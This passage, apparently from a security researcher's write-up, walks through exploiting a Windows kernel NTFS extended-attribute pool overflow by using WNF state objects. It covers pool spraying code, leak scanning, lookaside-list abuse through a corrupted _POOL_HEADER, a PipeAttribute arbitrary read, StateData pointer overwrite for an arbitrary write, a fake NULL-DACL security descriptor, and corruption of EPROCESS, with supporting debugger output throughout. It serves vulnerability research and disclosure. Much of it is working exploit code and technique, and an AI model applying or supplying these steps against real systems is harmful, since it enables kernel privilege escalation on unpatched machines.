Now we have the ability to perform both a controlled allocation and a controlled free, but what about the data itself, and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize denotes the size of the actual data following the structure within memory and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Having this relative read now allows disclosure of other adjacent objects within the pool. Some example output from my code:

found corrupted element changeTimestamp 54545454 at index 4972
len is 0xff
41 41 41 41 42 42 42 42  43 43 43 43 44 44 44 44  |  AAAABBBBCCCCDDDD
00 00 03 0B 57 6E 66 20  E0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  D0 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 0B 57 6E 66 20  80 56 0B C7 F9 97 D9 42  |  ....Wnf .V.....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |  AAAAAAAAAAAAAAAA
00 00 03 03 4E 74 66 30  70 76 6B D8 F9 97 D9 42  |  ....Ntf0pvk....B
60 D6 55 AA 85 B4 FF FF  01 00 00 00 00 00 00 00  |  `.U.............
7D B0 29 01 00 00 00 00  41 41 41 41 41 41 41 41  |  }.).....AAAAAAAA
00 00 03 0B 57 6E 66 20  20 76 6B D8 F9 97 D9 42  |  ....Wnf  vk....B
04 09 10 00 10 00 00 00  10 00 00 00 01 00 00 00  |  ................
41 41 41 41 41 41 41 41  41 41 41 41 41 41 41     |  AAAAAAAAAAAAAAA

At this point there are many interesting things which can be leaked out, especially considering that both the vulnerable NTFS chunk and the WNF chunk can be positioned next to other interesting objects. Items such as the ProcessBilled field can also be leaked using this technique.

We can also use the ChangeStamp value to determine which of our objects is corrupted when spraying the pool with _WNF_STATE_DATA objects.
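A sketch of the scan, reusing the sprayed states[] from earlier (NtQueryWnfStateData's prototype is again the public reconstruction, and the 0x54545454 marker matches the changeTimestamp shown in my example output above):

typedef ULONG WNF_CHANGE_STAMP;    // reconstruction, as before

NTSTATUS NTAPI NtQueryWnfStateData(const WNF_STATE_NAME *StateName,
                                   const VOID *TypeId,
                                   const VOID *ExplicitScope,
                                   WNF_CHANGE_STAMP *ChangeStamp,
                                   VOID *Buffer, ULONG *BufferSize);

UCHAR leak[0x1000];
for (int i = 0; i < SPRAY_COUNT; i++) {
    WNF_CHANGE_STAMP stamp = 0;
    ULONG size = sizeof(leak);
    if (NT_SUCCESS(NtQueryWnfStateData(&states[i], NULL, NULL, &stamp,
                                       leak, &size))
            && stamp == 0x54545454) {   // marker written by the overflow
        // The corrupted DataSize makes `size` exceed the original 0x10;
        // `leak` now spans the neighbouring pool chunks.
        break;
    }
}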

Relative Memory Write

So what about writing data outside the bounds?

Taking a look at the NtUpdateWnfStateData function, we end up with an interesting call: ExpWnfWriteStateData((__int64)nameInstance, InputBuffer, Length, MatchingChangeStamp, CheckStamp);. Below shows some of the contents of the ExpWnfWriteStateData function:

We can see that if we corrupt the AllocatedSize, represented by v12[1] in the code above, so that it is bigger than the actual size of the data, then the existing allocation will be used and a memcpy operation will corrupt further memory.

At this point it’s worth noting that the relative write has not really given us anything more than we already had with the NTFS overflow. However, as the data can be both read and written back using this technique, it opens up the ability to read data, modify certain parts of it and write it back.
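As a sketch, with victim being the index found during the scan above and the size an illustrative choice:

// sizeof(oob) exceeds the chunk's real capacity but passes the check
// against the corrupted AllocatedSize, so the trailing bytes overwrite
// the adjacent chunk.
UCHAR oob[0x100];
memset(oob, 'C', sizeof(oob));
NtUpdateWnfStateData(&states[victim], oob, sizeof(oob), 0, 0, 0, 0);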

_POOL_HEADER BlockSize Corruption to Arbitrary Read using Pipe Attributes

As mentioned previously, when I first started investigating this vulnerability, I was under the impression that the pool chunk needed to be very small in order to trigger the underflow. This wrong assumption led me to try to pivot to pool chunks of a more interesting variety. By default, within the 0x30 chunk segment alone, I could not find any interesting objects which could be used to achieve an arbitrary read.

Therefore my approach was to use the NTFS overflow to corrupt the BlockSize within the _POOL_HEADER of a 0x30-sized WNF chunk.

nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

By ensuring that the PoolQuota bit of the PoolType is not set, we can avoid any integrity checks when the chunk is freed.

By setting the BlockSize to a different size, once the chunk is freed using our controlled free, we can force the chunk’s address to be stored within the lookaside list for the wrong size.

We can then reallocate another object, matching the size we wrote into the corrupted header, so that it is served from that lookaside list and takes the place of the freed chunk.

Finally, we can trigger the overflow again and therefore corrupt this more interesting object.
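Sketched end to end with illustrative helper names (only the Nt* calls are real APIs), the sequence looks like this:

// 1. Groom the LFH so a 0x30 WNF chunk sits adjacent to the NTFS chunk.
groom_0x30_wnf_neighbour();
// 2. Overflow: rewrite the neighbour's _POOL_HEADER, setting BlockSize to
//    0x22 (0x220 / 0x10) and keeping the PoolQuota bit of PoolType clear.
trigger_ea_overflow_with_fake_pool_header();
// 3. Free the mis-sized chunk: its address is pushed onto the lookaside
//    list for the faked 0x220 size rather than the real 0x30 one.
NtDeleteWnfStateData(&victim_state, NULL);
// 4. Reallocate at the faked size: a 0x200-byte update yields a 0x220
//    chunk (0x200 data + 0x10 _WNF_STATE_DATA + 0x10 _POOL_HEADER) placed
//    at the recycled address, overlapping the old 0x30 neighbours.
NtUpdateWnfStateData(&new_state, big_buf, 0x200, 0, 0, 0, 0);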

Initially I demonstrated this being possible using another WNF chunk of size 0x220:

1: kd> !pool @rax
Pool page ffff9a82c1cd4a30 region is Paged pool
 ffff9a82c1cd4000 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4030 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4060 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4090 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd40f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4120 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4150 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4180 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd41e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4210 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4240 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4270 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd42d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4300 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4330 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4360 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4390 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd43f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4420 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4450 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4480 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd44e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4510 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4540 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4570 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd45d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4600 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4630 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4660 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4690 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd46f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4720 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4750 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4780 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd47e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4810 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4840 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4870 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd48d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4900 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4930 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4960 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4990 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd49f0 size:   30 previous size:    0  (Free)       NtFE
*ffff9a82c1cd4a20 size:  220 previous size:    0  (Allocated) *Wnf  Process: ffff8608b72bf080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffff9a82c1cd4c30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4c90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4cf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080
 ffff9a82c1cd4d80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff8608b72bf080

However, the main thing here is the ability to find a more interesting object to corrupt. As a quick win, the PipeAttribute object from the great paper https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf was also used.

typedef struct pipe_attribute {
    LIST_ENTRY list;
    char* AttributeName;
    size_t ValueSize;
    char* AttributeValue;
    char data[0];
} pipe_attribute_t;

As PipeAttribute chunks are also a controllable size and allocated on the paged pool, it is possible to place one adjacent to either a vulnerable NTFS chunk or a WNF chunk which allows relative writes.

Using this layout we can corrupt the PipeAttribute‘s Flink pointer and point this back to a fake pipe attribute as described in the paper above. Please refer back to that paper for more detailed information on the technique.

Diagrammatically we end up with the following memory layout for the arbitrary read part:

Whilst this worked and provided a nice reliable arbitrary read primitive, the original aim was to explore WNF more to determine how an attacker may have leveraged it.

The journey to arbitrary write

After taking a step back from this minor PipeAttribute detour, and with the realisation that I could actually control the size of the vulnerable NTFS chunks, I started to investigate whether it was possible to corrupt the StateData pointer of a _WNF_NAME_INSTANCE structure. Using this, so long as the DataSize and AllocatedSize could be aligned to sane values in the target area in which the overwrite was to occur, the bounds checking within ExpWnfWriteStateData would pass.

Looking at the creation of the _WNF_NAME_INSTANCE we can see that it will be of size 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. This ends up being put into a chunk of 0xC0 within the segment pool:

So the aim is to have the following occurring:

We can perform a spray as before using any size of _WNF_STATE_DATA which will lead to a _WNF_NAME_INSTANCE instance being allocated for each _WNF_STATE_DATA created.

Therefore we can end up with our desired memory layout, with a _WNF_NAME_INSTANCE adjacent to our overflowing NTFS chunk, as follows:

 ffffdd09b35c8010 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c80d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8190 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
*ffffdd09b35c8250 size:   c0 previous size:    0  (Allocated) *NtFE
        Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffffdd09b35c8310 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080       
 ffffdd09b35c83d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8490 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8550 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8610 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c86d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8790 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8850 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8910 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c89d0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8a90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8b50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8c10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8cd0 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8d90 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8e50 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080
 ffffdd09b35c8f10 size:   c0 previous size:    0  (Allocated)  Wnf  Process: ffff8d87686c8080

We can see before the corruption the following structure values:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0xffffdd09`ad45d4a0 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffffdd09`b35b3e10 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

Then, after our NTFS extended attribute overflow has occurred, we can see that a number of fields have been overwritten:

1: kd> dt _WNF_NAME_INSTANCE ffffdd09b35c8310+0x10
nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed, and that this could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name being queried.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

The external version of the StateName is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb
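As a compilable worked example using the external name from the dx output above:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t external = 0x41c64e6da36d9945ULL;
    uint64_t internal = external ^ 0x41C64E6DA3BC0074ULL;   // 0x00d19931

    printf("Version     = 0x%llx\n", (unsigned long long)(internal & 0xf));         // 0x1
    printf("LifeTime    = 0x%llx\n", (unsigned long long)((internal >> 4) & 0x3));  // 0x3
    printf("DataScope   = 0x%llx\n", (unsigned long long)((internal >> 6) & 0xf));  // 0x4
    printf("IsPermanent = 0x%llx\n", (unsigned long long)((internal >> 0xa) & 1));  // 0x0
    printf("Sequence    = 0x%llx\n", (unsigned long long)(internal >> 0xb));        // 0x1a33
    return 0;
}

The printed values match the Version, NameLifetime, DataScope, PermanentData and Sequence fields shown in the _WNF_STATE_NAME_STRUCT dump above.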

The key thing to realise here is that whilst Version, LifeTime and DataScope are controlled, the Sequence number for WnfTemporaryStateName state names is taken from a global counter.

As you can see from the below, based on the DataScope either the current Silo Globals or the Server Silo Globals are offset into to obtain v10, which is then used as the Sequence and incremented by 1 each time.

Then, in order to look up a name instance, the following code path is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as it sits just past the _RTL_BALANCED_NODE TreeLinks which the traversal pointer refers to; the tree itself is rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE structures is joined to the others via this TreeLinks element. The tree traversal code above therefore walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don’t necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide a fake security descriptor with the same values. This didn’t work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).

Ok then! Let’s just make the DACL NULL, so that the Everyone group has Full Control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c; // SE_SELF_RELATIVE | SE_DACL_PRESENT | SE_DACL_DEFAULTED
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;   // NULL DACL: everyone is granted full access

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that setting the StateData pointer to 0x6161616161616161 would produce a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, it is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function is a significantly hot path, and conditional breakpoints led to a huge program standstill.

Anyhow, typically after achieving an arbitrary write an attacker will leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following requirements needed to be met:

1) The internal StateName needs to match up with the external StateName used for the lookup, so the correct instance can be found when required.
2) The security descriptor needs to pass the checks in ExpWnfCheckCallerAccess.
3) The DataSize and AllocatedSize values need to be appropriate for the area of memory targeted.

So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
